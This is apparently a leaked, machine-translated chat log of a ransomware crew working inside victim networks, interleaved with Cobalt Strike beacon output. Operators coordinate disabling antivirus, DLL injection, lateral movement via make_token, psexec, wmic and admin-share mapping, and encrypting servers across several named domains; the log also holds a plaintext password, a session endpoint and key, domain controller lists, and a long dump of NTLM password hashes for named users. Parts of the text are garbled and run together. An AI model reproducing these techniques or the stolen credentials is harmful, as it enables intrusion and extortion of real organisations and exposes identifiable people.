12/21/2020  02:55 AM    <DIR>          Program Files (x86)
12/21/2020  02:55 AM    <DIR>          Quarantine
12/21/2020  02:55 AM             1,495 readme.txt
07/02/2019  01:59 PM                 0 TW.txt
07/02/2019  01:59 PM                 0 TW2.txt
12/21/2020  05:56 AM    <DIR>          Users
12/21/2020  05:56 AM    <DIR>          Windows
               7 File(s)          2,622 bytes
               9 Dir(s)  32,827,768,832 bytes free
```

kill the AV and run the exe
reopen, and if it's not alive?
If you forget, the sessions after the inject should be alive
I have my damamil on top
not see the popo and other things
maxima

```
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 195572 bytes
[+] received output:
Injected.
```
```
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes
```

I've opened 3 of the green servers to choose from
we map the workstations on it, inject, move on to the next one
someone write down the algorithm that you work by?
I don't have one
the question is relevant
I haven't finished the last word)
where is the logic?
You guys in my coba, having a problem with the massinject?
Encrypting the servers
Forget the answer
I answered you above, or I don't understand something
Are the guys in my coba having a problem with the array?
ok
forgot to put `- )`
o worked off the coba
Shifter
Ibahe.
If he himself doesn't want to, map his drives on another server
guys in my coba, what are you busy with?
don't run the exe from C:\

```
 Volume in drive C is OS
 Volume Serial Number is 584E-4F0A

 Directory of C:\

07/13/2009  09:20 PM    <DIR>          PerfLogs
02/10/2018  10:06 AM    <DIR>          Program Files
10/07/2019  08:20 PM    <DIR>          Program Files (x86)
10/16/2017  10:36 AM    <DIR>          Quarantine
01/06/2014  02:45 PM    <DIR>          temp
06/08/2018  07:52 AM    <DIR>          Users
08/20/2020  08:12 PM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  50,698,219,520 bytes free
```

and give me more
dir C:\
to try and change the dir + system rights?

```
Host Name:                 LRHPROFILES2
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-262-0784995-84931
Original Install Date:     5/24/2011, 9:39:37 PM
System Boot Time:          2/13/2020, 9:16:14 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
                           [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-06:00) Central Time (US & Canada)
Total Physical Memory:     4,096 MB
Available Physical Memory: 2,107 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 4,599 MB
Virtual Memory: In Use:    3,590 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    lrhc.local
Logon Server:              N/A
Hotfix(s):                 128 Hotfix(s) Installed.
                           [01]: KB981391
                           [02]: KB981392
                           [03]: KB977236
                           [04]: KB981111
                           [05]: KB977238
                           [06]: KB2764913
                           [07]: KB2764916
                           [08]: KB2718695
                           [09]: KB977239
                           [10]: KB2670838
                           [11]: KB981390
                           [12]: KB2425227
                           [13]: KB2446710
                           [14]: KB2484033
                           [15]: KB2497640
                           [16]: KB2503658
                           [17]: KB2506014
                           [18]: KB2506212
                           [19]: KB2506223
                           [20]: KB2506928
                           [21]: KB2507618
                           [22]: KB2508272
                           [23]: KB2508429
                           [24]: KB2509553
                           [25]: KB2510531
                           [26]: KB2511250
                           [27]: KB2511455
                           [28]: KB2515325
                           [29]: KB2522422
                           [30]: KB2524375
                           [31]: KB2533552
                           [32]: KB2533623
                           [33]: KB2534366
                           [34]: KB2536275
                           [35]: KB2536276
                           [36]: KB2541014
                           [37]: KB2544893
                           [38]: KB2545698
                           [39]: KB2547666
                           [40]: KB2552343
                           [41]: KB2560656
                           [42]: KB2563227
                           [43]: KB2564958
                           [44]: KB2570947
                           [45]: KB2584146
                           [46]: KB2585542
                           [47]: KB2603229
                           [48]: KB2604115
                           [49]: KB2607047
                           [50]: KB2608658
                           [51]: KB2618451
                           [52]: KB2620704
                           [53]: KB2621440
                           [54]: KB2631813
                           [55]: KB2639308
                           [56]: KB2640148
                           [57]: KB2643719
                           [58]: KB2645640
                           [59]: KB2647753
                           [60]: KB2653956
                           [61]: KB2654428
                           [62]: KB2655992
                           [63]: KB2656356
                           [64]: KB2660075
                           [65]: KB2667402
                           [66]: KB2676562
                           [67]: KB2685811
                           [68]: KB2685813
                           [69]: KB2685939
                           [70]: KB2690533
                           [71]: KB2691442
                           [72]: KB26698365
                           [73]: KB2699779
                           [74]: KB2705219
                           [75]: KB2706045
                           [76]: KB2709630
                           [77]: KB2712808
                           [78]: KB2718704
                           [79]: KB2719857
                           [80]: KB2726535
                           [81]: KB2729094
                           [82]: KB2729452
                           [83]: KB2731771
                           [84]: KB2732059
                           [85]: KB2742599
                           [86]: KB2743555
                           [87]: KB2750841
                           [88]: KB2753842
                           [89]: KB2757638
                           [90]: KB2758857
                           [91]: KB2761217
                           [92]: KB2763523
                           [93]: KB2765809
                           [94]: KB2770660
                           [95]: KB2785220
                           [96]: KB2786081
                           [97]: KB2786400
                           [98]: KB2789645
                           [99]: KB2791765
                           [100]: KB2798162
                           [101]: KB2804579
                           [102]: KB2807986
                           [103]: KB2808679
                           [104]: KB2813347
                           [105]: KB2813430
                           [106]: KB2820197
                           [107]: KB2820331
                           [108]: KB2830290
                           [109]: KB2833946
                           [110]: KB2834140
                           [111]: KB2834886
                           [112]: KB2839894
                           [113]: KB2840149
                           [114]: KB2844286
                           [115]: KB2849470
                           [116]: KB2850851
                           [117]: KB2859537
                           [118]: KB2861855
                           [119]: KB2862772
                           [120]: KB2862966
                           [121]: KB2863058
                           [122]: KB2868623
                           [123]: KB2999226
                           [124]: KB3154518
                           [125]: KB4019990
                           [126]: KB4499175
                           [127]: KB976902
                           [128]: KB976932
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.39.142
                                 [02]: fe80::f9c5:bb23:5d30:3177
```

Av off
c:\Windows\Temp all off?
where did you start it from?
eh
version of the oda updated, the same nonsense
I'm updating the exe
version of the Inge?
i can't even see it
after a while, no
udmi
file null
injected normally
works
why? is it possible you have 3 more trusts on top and you went down minus 40 mins
if the coba was cut off, more likely they already know about you
in temp
eokm
retract, retract and immediately put
if you don't use a session and they knock every 5 sec, you imagine what noise you create?
if you mapped under token change it and maps should be saved retract `` 10.10.30.173 10.10.30.175 10.10.30.176 10.10.30.177 10.10.30.180 10.10.30.183 10.10.30.196 10.10.30.206 10.10.30.208 10.10.30.210 10.10.30.211 10.10.30.212 10.10.30.222 10.10.30.223 10.10.30.225 10.10.30.226 10.10.30.230 10.10.30.231 10.10.30.244 10.10.30.245 10.10.30.246 10.10.30.247 10.10.30.248 10.10.30.249 10.10.31.70 10.10.37.11 10.10.39.18 10.10.39.40 10.10.39.68 10.10.39.83 10.10.39.85 10.10.39.149 10.10.39.179 10.10.39.180 10.10.39.181 10.10.39.184 10.10.39.186 10.10.39.187 10.10.70.5 169.254.0.2 169.254.0.2 172.23.15.10 you were supposed to be in the trusts for an hour then we're done in the other session, you were kicked out? beacon> make_token lrhc.local\nmsapps dragon374 [*] Tasked beacon to create a token for lrhc.local\nmsapps [+] host called home, sent: 46 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell net use * \\10.5.68.221\C$ [*] Tasked beacon to run: net use *\\10.5.68.221\C$ [+] host called home, sent: 57 bytes beacon> shell net use * \\10.10.222.20\C$ [*] Tasked beacon to run: net use * \\10.10.222.20\C$ [+] host called home, sent: 58 bytes beacon> shell net use * \\10.5.68.99\C$ [*] Tasked beacon to run: net use *\\\10.5.68.99\C$ [+] host called home, sent: 56 bytes beacon> shell net use * \\10.91.18.115\C$ [*] Tasked beacon to run: net use *\\\10.91.18.115\C$ [+] host called home, sent: 58 bytes beacon> shell net use * \\10.5.68.119\C$ [*] Tasked beacon to run: net use *\\\10.5.68.119\C$ [+] host called home, sent: 57 bytes beacon> shell net use * \\10.10.220.140\C$ [*] Tasked beacon to run: net use *\\10.10.220.140\C$ [+] host called home, sent: 59 bytes beacon> shell ping 10.10.220.140 [*] Tasked beacon to run: ping 10.10.220.140 [+] host called home, sent: 49 bytes beacon> shell dir C:\ [*] Tasked beacon to run: dir C:\ [+] host called home, sent: 38 bytes ``Don't touch them, they have my sessions. Take them. 
192.254.69.178:25674 VwboHyBv8QTsyelrIDPOEJ2Ee99JlhyiCK4 ``Compyping* from the second koba is pinged on all kobas and even trusts? Apparently our koba was cut offSessions is slacking on this server drop everything by hand to put the ehe very interesting OS, process list, edr, available RAMfeedback to the tulchan [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 217711 bytes [-] relocation truncated to fit (distance between executable code and other data is >4GB) ``then there is a reverse order here, more likely the client itself has not updated the polisy cloud, there is no polisy updatkak and vindef actually did you update it polisy on the clients? sofox is still chopping, although it seems disabledwhy? no, had to arma mapit you already moved to trusts? all pulled up share username=C:/ and since the disk then stop processes and services and unshare them yourself once vmic works) `` `` beacon> portscan 10.10.30.57 3389 [*] Tasked beacon to scan ports 3389 on 10.10.30.57 [+] host called home, sent: 93405 bytes [+] received output: (ICMP) Target '10.10.30.57' is alive. [read 8 bytes] 10.10.30.57:3389 Scanner module is complete ``Check for generalrdp disks? beacon> jump psexec 10.10.30.57 pipe [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 10.10.30.57 via Service Control Manager (\\10.10.30.57\ADMIN$\22adc14.exe) [+] host called home, sent: 287864 bytes [-] could not upload file: 64 [-] Could not start service 22adc14 on 10.10.30.57: 64 [-] Could not connect to pipe: 64 ``bindpipe is fighting? Not even a c$...`` beacon> shell wmic /node:10.10.30.57 share get caption,name,path [*] Tasked beacon to run: wmic /node:10.10.30.57 share get caption,name,path [+] host called home, sent: 201 bytes [+] received output: No Instance(s) Available. ``or even ѕhare request balls via get share from mikane fs? lrhppathif.lrhc.local ``What's the host? ``10.10.30.57 is still in process Didn't you delete the snaps already? 
```
beacon> execute-assembly SharpSharesNG.exe shares 10.10.30.57
[*] Tasked beacon to run .NET program: SharpSharesNG.exe shares 10.10.30.57
[+] host called home, sent: 129223 bytes
[+] received output:
******* COMPLETE *******
```

```
beacon> shell wmic /node:10.10.30.57 OS get NAME
[*] Tasked beacon to run: wmic /node:10.10.30.57 OS get NAME
[+] host called home, sent: 185 bytes
[+] received output:
Name
Microsoft® Windows Server® 2008 Standard |C:\Windows|\Device\Harddisk0\Partition1
```

raise the sessions, and then where they're not disconnected, don't go
if you have the ability to disable the AVs - always better via disabling the AVs
after the servers, then you can disable the AVs through psexec
disable the AVs
How did you decide to do it? disable the AVs or map?
since he's the admin) well then it makes sense
chop
was kinda admin from sofos, no?
dk in all domains in the last place
the biggest network we had at this stage, only here
in the tone do it all first
pull and map, then start everywhere else
however no, 100 pulled and mapped, then start 100 in all 4?
sofosMap and start immediately?and what is the av by the way7 then map the disks of the server and then run the builddrival pids and services are those responsible for the database or wiem for example because the hold is not taken off the network from busy filesnado chop services and pidservers that are not attractedbuild out then pull servers map the armies so if it flew into the block not to lose all at oncesessions from the first 3 to 1 kobu not pull in the first 3 domains open sessions and prepare accesses YES to work and start with the last because he is the biggesttut classics 1 kobu 100 servers worked from two with this network how many you have only kobu?`ELEAH.LOCAL` 17 servers 541 armies `ffmg.local` 9 servers 237 armies `mcklrh.mig 14 servers 46 armies `lrhc.local` 289 servers 2,638 armas almost half an hour we have not even begun to give status on all domains. how many servers and armas `APOfi98h&T6GHUs(&*fgTWE` I SharpShares rewrote a little, so they scansharfinder? scan subnets from sabinets - looking for where the admin admin Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- ADM/Domain Admins Administrator The command completed successfully. ``fucking LOCALGROUP administrators because you screwed up beacon> shell net group administrators [*] Tasked beacon to run: net group administrators [+] host called home, sent: 55 bytes [+] received output: This command can be used only on a Windows Domain Controller. More help is available by typing NET HELPMSG 3515. ``It's strange that la doesn't show...EA doesn't show, LA doesn't showDC``. ADMINDC5 10.0.61.13 ADMINDC1 10.0.61.2 ADMINDC3 10.0.61.6 ADMINDC4 10.0.61.7 ADMINDC2 10.0.61.10 SPOCK 10.7.51.3 AZUREDC1 10.221.32.4 ``DA``. 
administrator ad-script avamar backup bross CGSUMBUser ciscowireless citrixdb clusteradmin id-automation idautosupport installsvcs kaceinstaller ldelar mandl mherna02 munis munis2 munis3 mzuvan nsuser odomin papercut pgalde philipldap SAM sccmadmin sccmagent sccmsvc sisdservice sqlfc support tylerdfs tylerservice tylersisbackup umra-admin vdivmm webadmin ``net accounts Force user logoff how long after time expires?: Never Minimum password age (days): 30 Maximum password age (days): 999 Minimum password length: 6 Length of password history maintained: 3 Lockout threshold: Never Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: BACKUP The command completed successfully. ``Good job, good job,`` [DC] 'mcklrh.mig' will be the domain [DC] 'raddc02.mcklrh.mig' will be the DC server [DC] Exporting domain 'mcklrh.mig' 1001 SUPPORT_388945a0 6f033587ef18aa7281931967f8260e1015 66050 1616 nelson 2d7f1a5a61d3a96fb5159b5eef17adc6 514 1612 tech fbc52e18292b500a3b5a1982e19360d0 514 1151 test2 56ad694bdd191d54b6a49fc7e51d611c 514 1155 test4 28bb5d82dfe78e456c9a4f7c588c8727a 514 1168 t_winacc 71b43a8306d1bb60e84a0bc2400a5a21 512 1204 draugdahl 71b43a8306d1bb60e84a0bc2400a5a21 512 1225 drpearson 71b43a8306d1bb60e84a0bc2400a5a21 512 1229 drschmidt 71b43a8306d1bb60e84a0bc2400a5a21 512 1231 drtraiser 71b43a8306d1bb60e84a0bc2400a5a21 512 1239 mgblaplante 71b43a8306d1bb60e84a0bc2400a5a21 512 1244 drbusian 71b43a8306d1bb60e84a0bc2400a5a21 512 1247 drhenry 71b43a8306d1bb60e84a0bc2400a5a21 512 1249 drmcfarlane 71b43a8306d1bb60e84a0bc2400a5a21 512 1252 drstephens 71b43a8306d1bb60e84a0bc2400a5a21 512 1685 jastokfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1689 jdricksn 71b43a8306d1bb60e84a0bc2400a5a21 512 1680 drwernecke f648163703e6c08e66e778c9fcf1c695 512 1256 dmandemu 71b43a8306d1bb60e84a0bc2400a5a21 512 1699 tmtomhmu 71b43a8306d1bb60e84a0bc2400a5a21 512 1701 r_rollhs 71b43a8306d1bb60e84a0bc2400a5a21 512 1716 jjgreged 71b43a8306d1bb60e84a0bc2400a5a21 512 1717 
rliverfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1258 V_vanwsn 71b43a8306d1bb60e84a0bc2400a5a21 512 1262 amandamarthaler 71b43a8306d1bb60e84a0bc2400a5a21 512 1263 amysievert 71b43a8306d1bb60e84a0bc2400a5a21 512 1266 annetteellingson 71b43a8306d1bb60e84a0bc2400a5a21 512 1274 debschneider 71b43a8306d1bb60e84a0bc2400a5a21 512 1279 hollythompson 71b43a8306d1bb60e84a0bc2400a5a21 512 1281 jerimitchell 71b43a8306d1bb60e84a0bc2400a5a21 512 1283 jillbrethorst 71b43a8306d1bb60e84a0bc2400a5a21 512 1288 kathithompson 71b43a8306d1bb60e84a0bc2400a5a21 512 1289 katrinajohnson 71b43a8306d1bb60e84a0bc2400a5a21 512 1294 margaretmoore 71b43a8306d1bb60e84a0bc2400a5a21 512 1295 marilynewan 71b43a8306d1bb60e84a0bc2400a5a21 512 1296 maryfredrickson 71b43a8306d1bb60e84a0bc2400a5a21 512 1306 sherrimaanum 71b43a8306d1bb60e84a0bc2400a5a21 512 1307 sonyakelly 71b43a8306d1bb60e84a0bc2400a5a21 512 1314 vickirode e813a6c841263e9cf4127f2eb34f7cda 512 1318 glstabsn 71b43a8306d1bb60e84a0bc2400a5a21 512 1319 lanerrfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1320 sjnelson 71b43a8306d1bb60e84a0bc2400a5a21 512 1248 drkobriger 81b11bc140d8511fea3f1a627bc5069d 512 1112 calibrate 7e4026687ad6be0a6d736f1fabc8bc16 66048 1718 njolson 45a3cb98d159490c48e9add320b2754a 512 1260 betseypetersen 5af6ca259ee8bf3f44ec14900435a0a2 512 1195 cgtysver fa7d5249b9eaee7735cd74b7621d3c7f 512 1729 c_grafrc 71b43a8306d1bb60e84a0bc2400a5a21 512 1730 njjohnson e813a6c841263e9cf4127f2eb34f7cda 512 1735 tadebrito 71b43a8306d1bb60e84a0bc2400a5a21 512 1737 jwachlarowicz 71b43a8306d1bb60e84a0bc2400a5a21 512 1739 drkimoffice 71b43a8306d1bb60e84a0bc2400a5a21 512 1652 plwiczek 718cbf401001bbfd8fedda9dc078af6 512 1713 jmlien d76c4dbb99f9fe336e7634cfc0fd5d7b 512 1723 jjongeward 656e2f0fb9f108bb7008d5e6e57ac973 512 1329 dnheskin 71b43a8306d1bb60e84a0bc2400a5a21 512 1733 ckmaucrc 11c256333da14053ffb516f84c7876c4 512 1726 j_blonrc 2bd91c2112b3895a356dc850d6ed1acd 512 1700 ndhellhs ba7cabf4467a8145d97d787dd386d888 512 1224 drona 
006c00f6d6e35bdc75c69989060399c2 512 1741 drsell c7bad7d1cc2f3c69adea5ccb429234ad 512 1719 swancma 82cd2c655e2f5c0d096181faa5d9c54e 512 1172 nyhukjmu 789cc4b71ce5c2391956ac1df34ddd93 512 1673 edmgr 4b6d381d8bf53c5be1620293ceccacf3 512 1709 mahansed 9d79f63d8560fc299e5daeb07f0bccdf 512 1191 kjswanson 71b43a8306d1bb60e84a0bc2400a5a21 514 1760 h_billor 71b43a8306d1bb60e84a0bc2400a5a21 512 1728 mabakker 3fed67f37553c237ba0e3506ab7722d1 512 1334 patriciatell 71b43a8306d1bb60e84a0bc2400a5a21 514 1683 sdkroged 2bd09797bbcd1cb0c56b800b99b374fe8 512 1326 drovervold 71b43a8306d1bb60e84a0bc2400a5a21 512 1336 aefrank 71b43a8306d1bb60e84a0bc2400a5a21 512 1338 neflinck 71b43a8306d1bb60e84a0bc2400a5a21 512 1341 kjthompson 71b43a8306d1bb60e84a0bc2400a5a21 512 1342 hmanderson 71b43a8306d1bb60e84a0bc2400a5a21 512 1345 tanyaconroy 71b43a8306d1bb60e84a0bc2400a5a21 512 1347 debthom 71b43a8306d1bb60e84a0bc2400a5a21 512 1768 kimborgus 71b43a8306d1bb60e84a0bc2400a5a21 514 1724 drludwig 6db862a3e5993ea3245de09f7c560d5f 512 1714 uhlialed c1d60fccbdc09924681b9cf859ad1eeb 512 1740 drwoolner c36e58e7931f4dfbf68dd4e583ec39b1 512 1770 seedwafp 71b43a8306d1bb60e84a0bc2400a5a21 512 1771 banelson 71b43a8306d1bb60e84a0bc2400a5a21 512 1772 mwbabcock 71b43a8306d1bb60e84a0bc2400a5a21 512 1267 barbarabecker 014631dff7c5641f56b1264ce44b9e86 512 1677 n_saxed 5f998160d5a5c5771cbba046f9ecb191 512 1357 bjwasved 71b43a8306d1bb60e84a0bc2400a5a21 512 1276 dianeskistad b0d18851aaddc665883a0c2fc3eb1f95 512 1346 theresakallstrom 71b43a8306d1bb60e84a0bc2400a5a21 512 1653 rlswanson f08eaf4b67a44f9db354e7c0b6fc5437 512 1687 lmlundfp 85dd1a8770bd756de08b696064775da3 512 1192 lcundssu 71b43a8306d1bb60e84a0bc2400a5a21 512 1766 drvanderhagen 555f7cd2e083212e14b921c6d6eafff1 512 1360 petersm 612dcf80df63db5bd313d16e235e7e37 512 1774 holewam 3f1e1f48a52790b07fc8f7f78fd1896d 512 1674 ksgilbed 31d05994bf7883f4d452dd8a9f1f54 512 1780 kimkugler 71b43a8306d1bb60e84a0bc2400a5a21 512 1781 megangriep 
71b43a8306d1bb60e84a0bc2400a5a21 512 1779 nelssjcs b7496bd41da213cb86be83810f061dde 512 1366 dremokpae 71b43a8306d1bb60e84a0bc2400a5a21 512 1353 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512 1328 dsniklrc 71b43a8306d1bb60e84a0bc2400a5a21 514 1210 drhaeberlin 71b43a8306d1bb60e84a0bc2400a5a21 514 1361 howelam 71b43a8306d1bb60e84a0bc2400a5a21 514 1637 sbklein 45bd8db3b86d6a8b84fe7207cf2947ed 514 1184 ajmarfsu 860e03409ab78f44104caedfdc8828cf 512 1268 beverlyswanson 413995a825f8b6a0e5a834b0bdb47e83 512 1786 todd.test 782d1e5173aa367fe33e7e053beb33056 66080 1200 jlolson c3fb49594fecd04eb9f48f7ba427bda8 514 1712 dmwoldhs 57f3f7aa8bc515d493f9be1e451ad62a 512 1234 drwambach 0c4913e8c53fe4b010dfa6912537259d 512 1790 drakahara 48a83263e1c057daea02a7cb8e176eb0 512 1214 drkowitz 0172551e7970180b30fc40c267022f90 512 1670 aenorling 1f65c8fe7ee03766746f7bf6a2660326 512 1752 harsjlfp 59d6671166815ebb331ec92c8d0d6fd0 512 1676 l_roched cf42d09286c840daa07184cfb88c2b0d 512 1782 drbrady b22ac831efdbed50fd58d999b85901a5 512 1169 jeskilcc 71b43a8306d1bb60e84a0bc2400a5a21 512 1694 c_grotmu 83aa2cee51e1820b81117b7b24ea1277 512 1794 srwolemn 71b43a8306d1bb60e84a0bc2400a5a21 512 1213 drjoo 3a8413d12bee65e418af57e98a50ce401 512 1331 kmcarlson 71b43a8306d1bb60e84a0bc2400a5a21 512 1343 blfinksu 71b43a8306d1bb60e84a0bc2400a5a21 512 1645 maseivxr 0f1441e83d371915a7d51d151eae4e0f 512 1380 drm 71b43a8306d1bb60e84a0bc2400a5a21 512 1704 j_hallmu e79ff7c7b9a43a4f8f90373a22473330 512 1384 kmkoep 71b43a8306d1bb60e84a0bc2400a5a21 512 1385 seanmcdonald 9b908fe25801a0c4b58fbe51356c5511 512 1793 drjamison 42286d96f65b34de624c721fc0811e 512 1387 drdorr 71b43a8306d1bb60e84a0bc2400a5a21 512 1804 drnammour 71b43a8306d1bb60e84a0bc2400a5a21 512 1803 jeggers 71b43a8306d1bb60e84a0bc2400a5a21 512 1332 kmpaulsu 71b43a8306d1bb60e84a0bc2400a5a21 512 1675 pmahlsed eae0eb74a1fb7f1650235564fe53fd87 514 1389 suhlig 71b43a8306d1bb60e84a0bc2400a5a21 512 1806 lngervais 71b43a8306d1bb60e84a0bc2400a5a21 512 1278 
emilyanderson 93c6701c7cbed0e3023f9d8d4040d9c8 512 1821 cjhagel 71b43a8306d1bb60e84a0bc2400a5a21 512 1822 jnericfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1823 vwayres 71b43a8306d1bb60e84a0bc2400a5a21 512 1178 godtkesu 71b43a8306d1bb60e84a0bc2400a5a21 514 1238 pkutter f2dd7e09b601b1150a125fdf837ecab1 512 1814 lmgreesu 266b440f052f39f8b5085d46cfa8664b 512 1791 drpierce 85fea9b4d7122aa17bdc9eac23d67cad 512 1333 cjshockley 71b43a8306d1bb60e84a0bc2400a5a21 514 1393 drspeltz b11f4956811fd50e573fa91c3e06e7ff 512 1778 retz 71b43a8306d1bb60e84a0bc2400a5a21 512 1179 jbclassu 71b43a8306d1bb60e84a0bc2400a5a21 512 1831 klugert ba70d3be0d0794f0b6a4158e6ef5419b 512 1830 eanderson 157aaf2b5e766f4e3f41e9f65e4f1f16 512 1374 cgerhardson bf6bb7d7ae3ccdd414b9503133f2c9 512 1406 jhkhan 71b43a8306d1bb60e84a0bc2400a5a21 512 1245 mbraaten 71b43a8306d1bb60e84a0bc2400a5a21 512 1209 dretzell 71b43a8306d1bb60e84a0bc2400a5a21 512 1410 droppenheim 69aec82d520250d0ef7dd129b1b59f79 512 1372 kmisemer 66e9ad66103e96be56bf6595c97e847e 512 1407 april.hoaby 3279750c1b635b210f49a078f65ba504 512 1789 jbrown af16e20cecbde59670d59cc6bcf59895 512 1408 mhewson 4a15b1e5cc804fc563e92fb1cc2736ee 512 1186 ecklpasu 71b43a8306d1bb60e84a0bc2400a5a21 512 1400 easalata 71b43a8306d1bb60e84a0bc2400a5a21 512 1257 steramsu c6886c68ea545b39393356e21207c9ca91 512 1795 heidi 638579b8a17d0127b57bcedc6976eb76 512 1840 debstone 71b43a8306d1bb60e84a0bc2400a5a21 512 1841 kerridolan 71b43a8306d1bb60e84a0bc2400a5a21 512 1175 andekmsu 76bfcb4fa2358c890592c5d4a956aba0 514 1818 n_shorfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1843 drhswenson d1114a3e69a780a03f502ad29efd14ea 512 1753 kaholec a1467e26a9c0b09f6a828ddb09ca0695 512 1412 jkasowski 0123bd3c30a8631aabff7117b1231f35 512 1207 drcrintea 1d23b0251eff76781cb8221ab962a767 512 1663 sjseabor eda257f668850270be069bc300b44f08 512 1181 dcgolosu 0e2cf0faf8915da9729e54cb96acb1186 512 1832 eheath 27ba1a95ac5c9719fd458ee43456d29a 512 1801 lmoore bc26ef0fa677cec9695257fcaabac38d 512 1824 
tlbarrmu 71b43a8306d1bb60e84a0bc2400a5a21 512 1330 cjkurtxr d78ed82380a53851bcbdfb612c6b8b8a 512 1409 cweber 4d64ef67135fecc5bb20918df8b38ae 512 1826 vaross 2cb05598cb564216b64bc7132e5a3c17 514 1813 zielclpt 71b43a8306d1bb60e84a0bc2400a5a21 512 1269 caroljohnson 8b811002cbb05013271c130234f109ce 512 1388 bmayfield 72f5710f8901495212b162c9f4c0688b 512 1732 rcmgr 6d0b7222e3b4bc3075bbf8d242de10f0 512 1692 boseklmu 71b43a8306d1bb60e84a0bc2400a5a21 514 1746 ljrognbi 90ff62734f34b638a23a90096ebd83f2 512 1848 rthomas 71b43a8306d1bb60e84a0bc2400a5a21 512 1419 nygaard 74138648db6c91f3b109e33af2b67490 512 1849 daniellewest 71b43a8306d1bb60e84a0bc2400a5a21 512 1335 knjohnson 71b43a8306d1bb60e84a0bc2400a5a21 512 1350 glendahoff 41a0cf95ef2cd698846d4206e2150aea 512 1302 brennasu 71b43a8306d1bb60e84a0bc2400a5a21 512 1193 kjehlert 71b43a8306d1bb60e84a0bc2400a5a21 514 1825 krstenstrum 71b43a8306d1bb60e84a0bc2400a5a21 514 1634 jejohnson 71536fe0fcc8422e94815f0cc437f8ca 514 1857 drpahk 71b43a8306d1bb60e84a0bc2400a5a21 512 1859 drhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512 1860 drmhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512 1863 cconduah 71b43a8306d1bb60e84a0bc2400a5a21 512 1842 speterson 259ccc44e8d8285d03308e1d7a3950f4 512 1189 gjryansu d973bcbafd3c71be5a1d5770b0cc108b 514 1183 mrisaac 71b43a8306d1bb60e84a0bc2400a5a21 514 1695 imlundmu 71b43a8306d1bb60e84a0bc2400a5a21 514 1190 dmstorsu e9a3bb1f8098d80e1325a6450acd498d 512 1845 mhasbargen 1090fe654dada75e3b7ccf74536492ed 512 1182 slhanssu b333890541d008501cf2619854d23ab8 512 1864 ttomlinson 7a21990fcd3d759941e45c490f143d5f 512 1376 drmcguire 5e8d031f68497f6e5021a790bf98e88e 512 1632 adhoepxr 69e463660e9f2abd43f7b54c2bd1f903 514 1401 drlonginow 16d99248b55a4a6545926a6f69d0f347 512 1427 kflemming 4a57c663416c16cc53f6625fda9713e9 512 1433 drgreatens 71b43a8306d1bb60e84a0bc2400a5a21 512 1221 jmitchell 71b43a8306d1bb60e84a0bc2400a5a21 512 1220 drmathison 36f8dee2ff0c6e543fd59c047f67c8d2 512 1201 dramundson 
2a6ec2a808ddbb99cadf6d39e7ba10c6 512 1308 suehalvorson bfc33e7d7b1e1280e400e373314d3712 512 1720 thukkelberg ff60fbd62ec55db9065eecccfe8524db 512 1355 sarahnjos 8f59bbde2fd4f043e4c594fb949244c7 512 1394 aprilklimp 37b6aa4b892b68833f76a686647aeb93 512 1423 ashleylee 71b43a8306d1bb60e84a0bc2400a5a21 512 1851 tlarson 88867e83b76ac69ceff784f925c357bf 512 1437 drkahn fe8d33fc9cc21bd07b00febad40b9975 512 1386 edxray 71b43a8306d1bb60e84a0bc2400a5a21 66080 1344 anthonyaukes 97c7950753f28e3a0f3a5e1178e56a7b 512 1426 dneumann af97d4341d4e18cc86e7c5076910e691 512 1846 cldrevcc c66291f650232a5bf895a6729a354f0b 66080 1440 drengel 8f7c50ac5a16ea232e68219ebd4a2765 512 1873 mertesatxr 507388d7f5c9518cd213ba4d399dd534 512 1444 drsparacino 1bd1934e3efff393f5c41ca4defebfc3 512 1432 dnbeddow 961f4bdcf7eb72d71189c77c13f0b012 512 1176 surgmgr 8702ce315ef73fc3ece784001eb9928c 512 1391 drlee 1164e4a62a58f4d9f9f12f49c8841ff7 512 1218 drlocsin ddeb34a0b9aea78e864b28b6eb4735fe 512 1678 plschmmu c5f0862b2291f4f4e8082476375e8750 512 1852 tvogel 3acb51681be036c664ffd76c1d3bf0c9 512 1422 rfnorgren b88444c9d650771957bb82fcf7bc89d2 512 1858 drhegarty 71b43a8306d1bb60e84a0bc2400a5a21 512 1425 kjoleary 40132a60cd6f22212c8a527074a0a69c 512 1876 teraoye 84440338f26bf725be78c015f7d62c88 512 1838 abourassa 5d82f96da844c0bc97f6370935076591 512 1403 msshulka b9f917853e3dbf6e6831ecce60725930 512 1622 jmberg 8d1e3c6c096ed034d091bab932595813 512 1435 kperlinger 71b43a8306d1bb60e84a0bc2400a5a21 512 1708 aegrosfp 